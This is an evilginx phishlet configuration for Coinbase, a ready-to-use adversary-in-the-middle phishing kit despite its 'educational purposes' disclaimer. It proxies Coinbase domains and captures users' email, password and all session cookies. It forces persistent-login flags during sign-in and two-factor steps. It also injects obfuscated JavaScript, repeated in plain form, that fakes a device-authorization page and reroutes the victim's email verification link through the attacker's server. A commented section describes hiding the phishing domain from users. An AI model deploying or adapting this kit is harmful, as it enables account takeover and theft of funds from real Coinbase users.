coinbase.yaml

# AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
# PLEASE DO NOT MISUSE THIS PHISHLET.

# Don't Forget To set "domain" Params to your domain name (example.com)...
#
# Use This Command To set the domain params from the evilginx command line.
# Where ID is lure id number, and EXAMPLE.COM is your domain name.
# lures edit params ID domain=EXAMPLE.COM
 

author: '@An0nud4y'
min_ver: '2.3.0'
proxy_hosts:
  - {phish_sub: 'www', orig_sub: 'www', domain: 'coinbase.com', session: true, is_landing: true}
  - {phish_sub: 'ws', orig_sub: 'ws', domain: 'coinbase.com', session: true, is_landing: false}
  - {phish_sub: 'google', orig_sub: 'www', domain: 'google.com', session: true, is_landing: false}
  - {phish_sub: 'googletag', orig_sub: 'www', domain: 'googletagmanager.com', session: true, is_landing: false}
  - {phish_sub: '', orig_sub: '', domain: 'coinbase.com', session: true, is_landing: false}
  - {phish_sub: 'assets', orig_sub: 'assets', domain: 'coinbase.com', session: true, is_landing: false}
  - {phish_sub: 'dynamic', orig_sub: 'dynamic-assets', domain: 'coinbase.com', session: true, is_landing: false}
  - {phish_sub: 'cdn', orig_sub: 'cdn', domain: 'ravenjs.com', session: true, is_landing: false}
  - {phish_sub: 'sessions', orig_sub: 'sessions', domain: 'coinbase.com', session: true, is_landing: false}
  - {phish_sub: 'events', orig_sub: 'events-service', domain: 'coinbase.com', session: true, is_landing: false}
  - {phish_sub: 'exceptions', orig_sub: 'exceptions', domain: 'coinbase.com', session: true, is_landing: false}
  - {phish_sub: 'images', orig_sub: 'images', domain: 'coinbase.com', session: true, is_landing: false}


sub_filters:

# USED SUBFILTER TO INJECT THE JAVASCRIPT IN HTML PAGE TO MODIFY THE PAGE DYNAMICALLY.
# (Javascript is obfuscated due to fix the syntax issues , complete js code is available below in inject_js as well)
  - {triggers_on: 'www.coinbase.com', orig_sub: '', domain: 'coinbase.com',search: '</body>',replace: "<script>var _0x49ed=['value','appendChild','log','coinbase.com','className','open','getElementsByClassName','removeChild','replace','linkVerify','account-form\x20device-confirmation','_blank','focus','div','{domain}','createElement','account-inner','innerHTML','\x0a\x20\x20\x20\x20\x20\x20\x20\x20<img\x20class=\x22account-icon\x22\x20src=\x22https://www.coinbase.com/assets/quickstart/icon-signup-9ed7432acbf85046d2a12f1e29f9e245d6e8376b379b524a1ebb6250c993f4d1.png\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20<div\x20class=\x22account-icon\x22></div>\x0a\x20\x20\x20\x20\x20\x20\x20\x20<h2\x20class=\x22account-header\x22>Authorize\x20This\x20Login</h2>\x0a\x20\x20\x20\x20\x20\x20\x20\x20<p>Copy\x20The\x20Verification\x20Link\x20Received\x20in\x20Email\x20And\x20Paste\x20It\x20Below\x20To\x20Verify\x20The\x20Login\x20</p>\x0a\x20\x20\x20\x20\x20\x20\x20\x20<form\x20action=\x22\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20<fieldset>\x0a\x20\x20\x20\x20\x20\x20\x20\x20<input\x20type=\x22url\x22\x20name=\x22linkVerify\x22\x20id=\x22linkVerify\x22\x20placeholder=\x22https://coinbase.com/device_confirmations/confirm_email?token=xxxxxxxxxxxxxxxx\x22\x20pattern=\x22https://.*\x22>\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20<input\x20class=\x22btn\x22\x20type=\x22button\x22\x20value=\x22Verify\x20Device\x22\x20onclick=\x22ValidateLink()\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20</fieldset></form>\x0a\x20\x20\x20\x20\x20\x20\x20\x20<p></p>\x0a\x20\x20\x20\x20\x20\x20\x20\x20','parentNode','device-support'];(function(_0x1a71b2,_0x5dad2e){var _0x49ed95=function(_0x320ac2){while(--_0x320ac2){_0x1a71b2['push'](_0x1a71b2['shift']());}};_0x49ed95(++_0x5dad2e);}(_0x49ed,0x100));var _0x320a=function(_0x1a71b2,_0x5dad2e){_0x1a71b2=_0x1a71b2-0x107;var _0x49ed95=_0x49ed[_0x1a71b2];return _0x49ed95;};window['onload']=function(){lp0();};function lp0(){try{lp();}catch(_0x1a1b45){setTimeout(lp,0x64);}};function lp(){var _0x51f26e=_0x320a,_0x56e4a3=document[_0x51f26e(0x109)](_0x51f26e(0x113))[0x0];_0x56e4a3[_0x51f26e(0x116)][_0x51f26e(0x10a)](_0x56e4a3);var _0x31315c=document['getElementsByClassName']('device-support')[0x0];_0x31315c['parentNode'][_0x51f26e(0x10a)](_0x31315c);var _0xde8b4f=document[_0x51f26e(0x112)](_0x51f26e(0x110));_0xde8b4f[_0x51f26e(0x107)]=_0x51f26e(0x113),_0xde8b4f[_0x51f26e(0x114)]=_0x51f26e(0x115),document[_0x51f26e(0x109)](_0x51f26e(0x10d))[0x0][_0x51f26e(0x119)](_0xde8b4f);var _0xde8b4f=document[_0x51f26e(0x112)](_0x51f26e(0x110));_0xde8b4f[_0x51f26e(0x107)]=_0x51f26e(0x117),_0xde8b4f['innerHTML']='\x0a\x20\x20\x20\x20\x20\x20\x20\x20<p>Email\x20didn\x27t\x20arrive?</p>\x0a\x20\x20\x20\x20\x20\x20\x20\x20<p>Visit\x20our\x20<a\x20href=\x22https://support.coinbase.com/customer/portal/articles/2521789\x22>Support\x20Center</a>.</p>\x0a\x20\x20\x20\x20\x20\x20\x20\x20<p></p>\x0a\x20\x20\x20\x20\x20\x20\x20\x20<p>\x0a\x20\x20\x20\x20\x20\x20\x20\x20<a\x20href=\x22/email_recovery/new\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20I\x20no\x20longer\x20have\x20access\x20to\x20my\x20email\x20address\x0a\x20\x20\x20\x20\x20\x20\x20\x20</a>\x20\x20\x20\x20\x20\x20</p>\x0a\x20\x20\x20\x20\x20\x20\x20\x20',document[_0x51f26e(0x109)](_0x51f26e(0x10d))[0x0][_0x51f26e(0x119)](_0xde8b4f);return;}function ValidateLink(){var _0x5c0ae6=_0x320a,_0xf54a5d=_0x5c0ae6(0x111),_0x4f56d6=document['getElementById'](_0x5c0ae6(0x10c))[_0x5c0ae6(0x118)],_0x4c470d=_0x4f56d6[_0x5c0ae6(0x10b)](_0x5c0ae6(0x11b),_0xf54a5d);console[_0x5c0ae6(0x11a)](_0x4c470d),window[_0x5c0ae6(0x108)](_0x4c470d,_0x5c0ae6(0x10e))[_0x5c0ae6(0x10f)]();}setTimeout(function(){lp();},0xdac);  </script></body>" ,mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript'] ,with_params: ['/device_confirmations/new']}

  - {triggers_on: 'www.coinbase.com', orig_sub: 'www', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.coinbase.com', orig_sub: 'www', domain: 'coinbase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.coinbase.com', orig_sub: 'assets', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.coinbase.com', orig_sub: 'assets', domain: 'coinbase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.coinbase.com', orig_sub: 'dynamic-assets', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.coinbase.com', orig_sub: 'dynamic-assets', domain: 'coinbase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.coinbase.com', orig_sub: 'sessions', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.coinbase.com', orig_sub: 'sessions', domain: 'coinbase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.coinbase.com', orig_sub: 'events-service', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.coinbase.com', orig_sub: 'events-service', domain: 'coinbase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.coinbase.com', orig_sub: 'exceptions', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.coinbase.com', orig_sub: 'exceptions', domain: 'coinbase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.coinbase.com', orig_sub: 'images', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.coinbase.com', orig_sub: 'images', domain: 'coinbase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.coinbase.com', orig_sub: '', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.coinbase.com', orig_sub: '', domain: 'coinbase.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.coinbase.com', orig_sub: 'ws', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.coinbase.com', orig_sub: 'ws', domain: 'coinbase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.coinbase.com', orig_sub: 'www', domain: 'google.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.coinbase.com', orig_sub: 'www', domain: 'google.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.coinbase.com', orig_sub: 'www', domain: 'googletagmanager.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.coinbase.com', orig_sub: 'www', domain: 'googletagmanager.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}

auth_tokens:
  - domain: 'www.coinbase.com'
    keys: ['.*,regexp']
auth_urls:
  - '/dashboard'
  - '/dashboard/.*'    
credentials:
  username:
    key: 'email'
    search: '(.*)'
    type: 'post'
  password:
    key: 'password'
    search: '(.*)'
    type: 'post'
force_post:
  - path: '/sessions'
    search:
      - {key: 'email', search: '.*'}
      - {key: 'password', search: '.*'}
    force:
      - {key: 'stay_signed_in', value: '1'}
    type: 'post'
  - path: '/signin_step_two'
    search:
      - {key: 'token', search: '.*'}
      - {key: 'phone_number_id', search: '.*'}
    force:
      - {key: 'remember_computer', value: '1'}
    type: 'post'

login:
  domain: 'www.coinbase.com'
  path: '/signin'


# "function lp()" will dynamically replace the contents in device authentication html page, and will create a new input box and button. Some other replacements are just to make page look better.
# "function ValidateLink()" will replace the pdomain name 'coinbase.com' with the evilginx server domain name to verify the device from the IP of evilginx server, and will popup a new window with that modified auth link. 
#  In that way we will be able to successfully authenticate the new device login.

# "function hcaptcha()" will replace the domain name during the captcha validation to decrease the possibility of getting caught by the user.

js_inject:
  - trigger_domains: ["www.coinbase.com"]
    trigger_paths: ["/device_confirmations/new"]
    trigger_params: [domain]
    script: |
      window.onload = function() {
        lp0();
        }
      function lp0() {
        try {
            lp()
        } catch (err) {
            setTimeout(lp, 100);
        }
        };
      function lp(){
        var elem1 = document.getElementsByClassName("account-inner")[0];
        elem1.parentNode.removeChild(elem1); 
        var elem2 = document.getElementsByClassName("device-support")[0];
        elem2.parentNode.removeChild(elem2);
        var div = document.createElement('div');
        div.className = 'account-inner';
        div.innerHTML = `
        <img class="account-icon" src="https://www.coinbase.com/assets/quickstart/icon-signup-9ed7432acbf85046d2a12f1e29f9e245d6e8376b379b524a1ebb6250c993f4d1.png">
        <div class="account-icon"></div>
        <h2 class="account-header">Authorize This Login</h2>
        <p>Copy The Verification Link Received in Email And Paste It Below To Verify The Login </p>
        <form action="">
        <fieldset>
        <input type="url" name="linkVerify" id="linkVerify" placeholder="https://coinbase.com/device_confirmations/confirm_email?token=xxxxxxxxxxxxxxxx" pattern="https://.*"> 
        <input class="btn" type="button" value="Verify Device" onclick="ValidateLink()">
        </fieldset></form>
        <p></p>
        `;
        document.getElementsByClassName("account-form device-confirmation")[0].appendChild(div);
        var div = document.createElement('div');
        div.className = 'device-support';
        div.innerHTML = `
        <p>Email didn't arrive?</p>
        <p>Visit our <a href="https://support.coinbase.com/customer/portal/articles/2521789">Support Center</a>.</p>
        <p></p>
        <p>
        <a href="/email_recovery/new">
          I no longer have access to my email address
        </a>      </p>
        `;
        document.getElementsByClassName("account-form device-confirmation")[0].appendChild(div);
        return;
      }
      function ValidateLink(){
        var domain = "{domain}"
        var link1 = document.getElementById("linkVerify").value;
        var link2 = link1.replace('coinbase.com', domain);
        console.log(link2)
        window.open(link2, '_blank').focus();
      }
      setTimeout(function(){ lp(); }, 3500);
      
# HCAPTCHA Header That shows domain name can be Replaced dynamically with javascripts, Its Disabled Here Because Its resulting in Hcaptcha error, Find your ways to solve it.
#
#  - trigger_domains: ["www.coinbase.com"]
#    trigger_paths: ["/signin","/signin*"]
#    trigger_params: []
#    script: |
#      function hcaptcha(){
#        var elem = document.getElementsByClassName("cf-subheadline")[0];
#        elem.parentNode.removeChild(elem);
#        var div = document.createElement('div');
#        div.className = 'cf-subheadline';
#        div.innerHTML = `
#        <h2 class="cf-subheadline"><span data-translate="complete_sec_check">Please complete the security check to get access to</span> Coinbase Website</h2>
#        `;
#        document.getElementsByClassName("cf-wrapper cf-header cf-error-overview")[0].appendChild(div);
#        return;
#        }